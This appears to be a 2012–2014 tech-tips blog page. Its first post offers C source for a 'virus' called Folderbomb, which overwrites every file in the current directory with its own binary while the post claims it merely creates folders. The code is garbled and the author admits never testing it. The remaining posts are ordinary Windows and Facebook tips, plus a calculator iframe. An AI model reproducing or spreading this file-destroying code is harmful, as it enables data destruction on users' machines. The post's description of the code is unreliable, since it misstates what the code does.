Saturday 23 August 2014

How to Create Virus Code In C Language



It will create folder in a folder. Use below codes.
Run this on your own responsibility.


#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(‖————————————————————————–‖);
printf(‖\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n‖); 
cprintf(‖————————————————————————–‖);
done = findfirst(‖*.*‖,&ffblk,0);
while (!done) 
{ printf(‖\n‖);cprintf(‖ %s ―, ffblk.ff_name);printf(‖is attacked by ―);cprintf(‖Folderbomb‖); 
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}


“Well I did not try this virus by my self, so try this and give me your feedback. But still I do not recommend to use this virus for bad purpose”


Friday 30 November 2012

How To Remove the Recycle Bin


If you prefer to work with a completely clear desktop, you can hide the Recycle Bin with a little Registry hack. You can still use the [Shift] + [Delete] shortcut to access the Bin when you need it.

How To Hide:-

Choose 'Start | Run' and type Regedit in the 'Open' bar. Click 'OK'. Now browse to the following location:

'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Explorer\HideDesktop Icons\NewStartPanel\' 
Create a new DWORD value and give it the following name: 

{645FF040-5081-101B-9F08-00AA002F954E}

Then Double-click on it and change its value to '1'. Quit Registry Editor, then Refresh your Windows. The Recycle Bin icon will magically disappear from the desktop. You can get it back again at any time by changing the value back to '0'.

Don't Forget To Share and Likes us.

Monday 26 November 2012

How To Find Facebook ID ?

This is very easy to find facebook ID.

How?

  • Login to your Facebook Profile.
  • Go to below link
http://graph.facebook.com/yourusername

  • Replace yourusername with yours.
As my Facebook username is www.computerzoneofabhinav so for my fcebook ID i will go http://graph.facebook.com/www.computerzoneofabhinav.

Don't Forget To Share and Like Us.


How To Post Blank Status And Comment In Facebook

How to post blank status or comment on Facebook to astonish your friends. Here is a little code, you just have to post the code in status or comment box.

If you want to show blank status box or comment then use below code and paste in your status or comment box.

@[0:0: ]

Don't Forget To Share This Trick and Like Us.


Friday 23 November 2012

How To Disable Autorun.Inf Virus



Autorun.inf is a fatal virus for computer but if you use an antivirus for your computer it does not detect the autorun.inf virus.This virus create immense problem in your important computer where stored your notes or others things.if you use windows xp you can easily disable this virus.

How To Disable:-

For Window's XP


  • Go to Start Menu \ Run and type in:

gpedit.msc

  • You will see the Group Policy window. You should select Administrative Templates \ System in the tree view:
  • You will see an item in the right side pane called “Turn off Autoplay”
  • Double click the item, and set the radio button to Enabled, and change the “Turn off Autoplay on” to All Drives.
  • Now you should be safe from the autoplay monster.

For Window 7


  • Go to Start Menu \ Run and type in:
gpedit.msc


  • The Local Group Policy Editor will be launched.

  • Now navigate to Computer Configuration > Administrative Templates > Windows Components.

  • Locate the Turn off Autoplay option, then right click it and choose the Edit option.

  • On the next step, click the Enabled option.

  • Click the Apply button to complete the configuration. Make sure to select All drives from the drop down menu of the Turn off Autoplay on option,to disable Autorun on all drives.
Don't Forget To Share and Like Us

Wednesday 21 November 2012

Make Your Own Calculator With JavaScript


Calculators basically made of C, C++ and Java but this simple calculator has been developed with only JavaScript. It is not scientific calculator as the JavaScript calculator is confined to limited functions. You can add, multiply, minus and divide only.

Demo

For JavaScript Code Of Above Calculator Click Here

If you want to show the calculator in your blog then copy the Below code and paste the following code.

<center><iframe src="http://dl.dropbox.com/u/109984716/calculatorbycz.html" style="border:0px #FFFFFF none;" name="JavaScript Calculator" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="320px" width="600px"></iframe></center>

Sunday 18 November 2012

How to Create your own Sleep button in Windows XP



Is the Sleep button on your Windows XP machine in an inconvenient location for regular use? If so, follow these simple steps to create your own.

Many computers or keyboards have a Sleep button, which when pressed puts the computer into either Stand By or Hibernate mode depending on how Windows XP's Power Options are configured. However, the Sleep button might not be in convenient location for regular use. For example, it might be on the front of a mid-tower case that's under your desk.

You could activate Stand By or Hibernate mode from the Shut Down Windows dialog box. An alternative to this method is to create your own Sleep button by creating a shortcut on your desktop.

How:-
  • Right-click on the desktop.
  • Point to New and Click on Shortcut.
  • Type rundll32.exe powrprof.dll,SetSuspendState in the Location text box.
  • Click Next.
  • Type Sleep in the text box and click Finish.
Now when you click the Sleep icon, Windows XP will put the computer into either Stand By or Hibernate mode depending on how the When I Press The Sleep Button On My Computer setting is configured on the Advanced tab of the Power Options Properties dialog box.

Don't Forget To Share and Like Us.